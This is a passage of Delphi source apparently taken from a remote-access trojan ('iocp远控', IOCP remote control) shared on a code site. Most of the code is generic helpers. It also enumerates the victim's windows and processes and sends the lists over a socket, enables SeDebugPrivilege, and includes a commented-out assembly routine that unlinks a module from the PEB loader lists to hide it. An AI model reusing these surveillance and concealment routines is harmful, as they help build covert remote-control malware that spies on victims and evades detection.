publicfunctionunit.pas

delphi源代码。iocp远控比较完整的代码

        WindowListStr := WindowListStr + '<item IsVisibleWindow="' + 'No'; 
      WindowListStr := WindowListStr +
        '" Index="' + IntToStr(WindowsNumber) +
        '" WindowID="' + IntToStr(hWnd) +
        '" title="' + titleStr +
        '" classname="' + classnameStr +
        '" ProcID="' + IntToStr(DWORD(ProcID)) +
        //'" AppPath="' + AppPath +
        '"/>';
      Inc(WindowsNumber);
    end
    else
    begin
      SetEvent(FinishSearchWindowNotifyEvent);
      Exit;
    end;
  end
  else
    Result := False;
end;

//发送窗口列表信息
procedure SendAllWindowList(const Socket : TSocket);
begin
  //清空先
  WindowListStr := '';
  WindowsNumber := 0;
  Windows.EnumWindows(@EnumWindowsProc, 0);
  //等待窗口搜索完毕
  WaitForSingleObject(FinishSearchWindowNotifyEvent, 500);
  //发送出去
  GetListAndSend(Socket, WindowListStr, False, WindowsListType);
end;

//得到进程列表，并发送
procedure GetProcessListAndSend(const Socket : TSocket);
var
  Found : Boolean; //定义枚举进程所需变量
  FSnapshotHandle : THANDLE;
  LAppE : TProcessEntry32;
  Summ: Word;
  i : integer;
  ExeShortName, ExeFileName, ProcessListStr : string;
begin
  //CreateToolhelp32Snapshot函数得到进程快照
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  //初始化
  LAppE.dwSize := Sizeof(LAppE);
  //得到一个系统快照里第一个进程的信息
  Found := Process32First(FSnapshotHandle, LAppE);
  Summ := 0;
  ProcessListStr := '';
  while Found do
  begin
    //返回进程名称
    ExeShortName := LAppE.szExeFile; 
    //返回每个进程文件所在路径
    ExeFileName :=  GetAppFromProcID(LAppE.th32ProcessID);
    //转换非法字符串
    if ExeShortName <> '' then
      for i := 1 to Length(ExeShortName) do
        if (ExeShortName[i] = '&') then
          ExeShortName[i] := '?';
    if ExeFileName <> '' then
      for i := 1 to Length(ExeFileName) do
        if (ExeFileName[i] = '&') then
          ExeFileName[i] := '?';
    ProcessListStr := ProcessListStr +
      '<item Index="' + IntToStr(Summ) +
      '" ExeShortName="' + ExeShortName +
      '" ProcessID="' + IntToStr(LAppE.th32ProcessID) +
      '" ExeFileName="' + ExeFileName +
      '"/>';
    Found := Process32Next(FSnapshotHandle, LAppE);
    Inc(Summ);
  end;
  CloseHandle(FSnapshotHandle);
  GetListAndSend(Socket, ProcessListStr, False, ProcessListType);
end;

{
function HideModuleFromPEB( proc hInstDLL ) : DWORD;
        assume  fs:nothing
        mov     esi,hInstDLL
        xor     eax,eax
        mov     eax,fs:[eax].TEB.Peb
        mov     eax,[eax].PEB.Ldr
        lea     eax,[eax].PEB_LDR_DATA.InLoadOrderModuleList
        @@:
        mov     eax,[eax].LDR_MODULE.InLoadOrderModuleList.Flink
        cmp     esi,[eax].LDR_MODULE.BaseAddress
        jnz     @B
        mov     esi,[eax].LIST_ENTRY.Flink
        mov     ebx,[eax].LIST_ENTRY.Blink
        mov     [ebx].LIST_ENTRY.Flink,esi
        mov     esi,[eax].LIST_ENTRY.Blink
        mov     ebx,[eax].LIST_ENTRY.Flink
        mov     [ebx].LIST_ENTRY.Blink,esi
        lea     eax,[eax].LDR_MODULE.InMemoryOrderModuleList
        mov     esi,[eax].LIST_ENTRY.Flink
        mov     ebx,[eax].LIST_ENTRY.Blink
        mov     [ebx].LIST_ENTRY.Flink,esi
        mov     esi,[eax].LIST_ENTRY.Blink
        mov     ebx,[eax].LIST_ENTRY.Flink
        mov     [ebx].LIST_ENTRY.Blink,esi
        ret
HideModuleFromPEB endp 
}

(*----------------------------以下函数是共用函数-----------------------------*)

//检查文件是不是存在的
function DirectoryExists(const Directory: string): boolean;
var
  Handle : THandle;
  FindData : TWin32FindData;
begin
  Handle := FindFirstFile(pchar(Directory),FindData);
  Result := (Handle <> INVALID_HANDLE_VALUE) and
    (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY <> 0); 
  if(Handle <> INVALID_HANDLE_VALUE) then
    Windows.FindClose(Handle);
end;

//获取文件夹
function ExtractFilePath(sFile: String): String; stdcall;
var
  i: Integer;
  j: Integer;
begin
  j := length(sFile);
  for i := 1 to length(sFile) do
    if sFile[i] = '\' then j := i;
  result := Copy(sFile, 1, j);
end;

//获取文件名
function ExtractFileName(sFile: String): String; stdcall;
var
  i: Integer;
  j: Integer;
begin
  j := 0;
  for i := 1 to length(sFile) do
    if (sFile[i] = '\') then j := i;
  sFile := Copy(sFile,j+1,length(sFile));
  j := 0;
  for i := 1 to length(sFile) do
    if (sFile[i] = '.') then j := i;
  if j = 0 then j := length(sFile)+1;
  Result := Copy(sFile,1,j-1);
end;

//inttostr function
function IntToStr(IntValue : integer) : string;
const
  MAX_DIGITIS_INT = 10;
var
  i, j, isNeg : integer;
  tmpStr, tmpResultStr : array[0..MAX_DIGITIS_INT + 1] of Char;
begin
  i := 0;
  j := 0;
  isNeg := 0;
  ZeroMemory(@tmpResultStr[0], MAX_DIGITIS_INT + 2);
  if IntValue < 0 then
  begin
    IntValue := -IntValue;
    isNeg := 1;
  end;
  repeat
    tmpStr[i] := Char((IntValue mod 10) + Byte('0'));
    Inc(i);
    IntValue := IntValue div 10;
  until (IntValue <= 0);
  if isNeg > 0 then
  begin
     tmpStr[i] := '-';
     Inc(i);
  end;
  while (i > 0) do
  begin
    tmpResultStr[j] := tmpStr[i - 1];
    Inc(j);
    Dec(i);
  end;
  Result := tmpResultStr;
end;

//字符串转int
function StrToInt(ConvertStr : string) : integer;
var
  i, num, isNeg : integer;
begin
  i := 1;
  num := 0;
  isNeg := 0;
  if ConvertStr[1] = '-' then
  begin
    i := 2;
    isNeg := 1;
  end;
  while (Byte(ConvertStr[i]) > 0 ) do
  begin
   num := num * 10;
   num := num + (Byte(ConvertStr[i]) - Byte('0'));
   Inc(i);
  end;
  if (isNeg = 1) then
    num := -num;
  Result := num;
end;

//转化为hex字符串
function IntToHex(dwValue, dwDigits: DWord): String; stdcall;
const
  hex: array[0..$F] of char = ('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
begin
  if (dwDigits > 8) then
    dwDigits := 8;
  Result := Copy(
    hex[(dwValue and $F0000000) shr 28] +
    hex[(dwValue and $0F000000) shr 24] +
    hex[(dwValue and $00F00000) shr 20] +
    hex[(dwValue and $000F0000) shr 16] +
    hex[(dwValue and $0000F000) shr 12] +
    hex[(dwValue and $00000F00) shr 8] +
    hex[(dwValue and $000000F0) shr 4] +
    hex[(dwValue and $0000000F) shr 0], 9 - dwDigits, dwDigits);
end;

//得到最小值
function Min(const A, B: Integer): Integer;
begin
  if A < B then
    Result := A
  else
    Result := B;
end;

//释放类实例，并nil指针
procedure FreeAndNil(var Obj);
var
  Temp: TObject;
begin
  Temp := TObject(Obj);
  Pointer(Obj) := nil;
  Temp.Free;
end;

//转为小写
function LowerCase(sString: String): String; stdcall;
var
  Ch    : Char;
  L     : Integer;
  Source: PChar;
  Dest  : PChar;
begin
  L := Length(sString);
  SetLength(Result, L);
  Source := Pointer(sString);
  Dest := Pointer(Result);
  while L <> 0 do
  begin
    Ch := Source^;
    if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;

//转为大写
function UpperCase(sString: String): String; stdcall;
var
  Ch    : Char;
  L     : Integer;
  Source: PChar;
  Dest  : PChar;
begin
  L := Length(sString);
  SetLength(Result, L);
  Source := Pointer(sString);
  Dest := Pointer(Result);
  while L <> 0 do
  begin
    Ch := Source^;
    if (Ch >= 'a') and (Ch <= 'z') then Dec(Ch, 32);
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;

//得到调试权限
function EnableDebugPrivilege : Boolean;
  function EnablePrivilege(hToken : Cardinal; PrivName : string; bEnable : Boolean) : Boolean;
  var
    TP : TOKEN_PRIVILEGES;
    Dummy : Cardinal;
  begin
    Result := False;
    try
      TP.PrivilegeCount := 1;
      LookupPrivilegeValue(nil, pchar(PrivName), TP.Privileges[0].Luid);
      if bEnable then
        TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
      else
        TP.Privileges[0].Attributes := 0;
      windows.AdjustTokenPrivileges(hToken, False, TP, SizeOf(TP), nil, Dummy);
      Result := GetLastError = ERROR_SUCCESS;
    except

    end;
  end;
var
  hToken : Cardinal;
begin
  Result := False;
  try
    OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken);
    Result := EnablePrivilege(hToken, 'SeDebugPrivilege', True);
    CloseHandle(hToken);
  except

  end;
end;

//将类内函数转化为实例函数
{
使用此函数需要注意两点：
1、The return value should not be of type String, dynamic array, method or Variant pointer.
2、The method must be declared as stdcall.
不过还好，大部分的系统回调函数都要求是stdcall的，并且返回值一般都是boolean类型的。
}
function MakeProcInstance(M: TMethod): Pointer;
begin
  // allocate memory
  GetMem(Result, 15);
  asm
    // MOV ECX,
    MOV BYTE PTR [EAX], $B9
    MOV ECX, M.Data
    MOV DWORD PTR [EAX+$1], ECX
    // POP EDX
    MOV BYTE PTR [EAX+$5], $5A
    // PUSH ECX
    MOV BYTE PTR [EAX+$6], $51
    // PUSH EDX
    MOV BYTE PTR [EAX+$7], $52
    // MOV ECX,
    MOV BYTE PTR [EAX+$8], $B9
    MOV ECX, M.Code
    MOV DWORD PTR [EAX+$9], ECX
    // JMP ECX
    MOV BYTE PTR [EAX+$D], $FF
    MOV BYTE PTR [EAX+$E], $E1
  end;
end;

//释放掉实例化占用的内存
procedure FreeProcInstance(ProcInstance: Pointer);
begin
  // free memory
  FreeMem(ProcInstance, 15);
end;

//检查文件是否存在
function FileAge(const FileName: string): Integer;
type
  LongRec = packed record
    case Integer of
      0: (Lo, Hi: Word);
      1: (Words: array [0..1] of Word);
      2: (Bytes: array [0..3] of Byte);
  end;
var
  Handle: THandle;
  FindData: TWin32FindData;
  LocalFileTime: TFileTime;
begin
  Handle := FindFirstFile(PChar(FileName), FindData);
  if Handle <> INVALID_HANDLE_VALUE then
  begin
    Windows.FindClose(Handle);
    if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then
    begin
      FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
      if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi,
        LongRec(Result).Lo) then Exit;
    end;
  end;
  Result := -1;
end;

//检查文件是否存在
function FileExists(const FileName: string): Boolean; 
begin
  Result := FileAge(FileName) <> -1;
end;

end.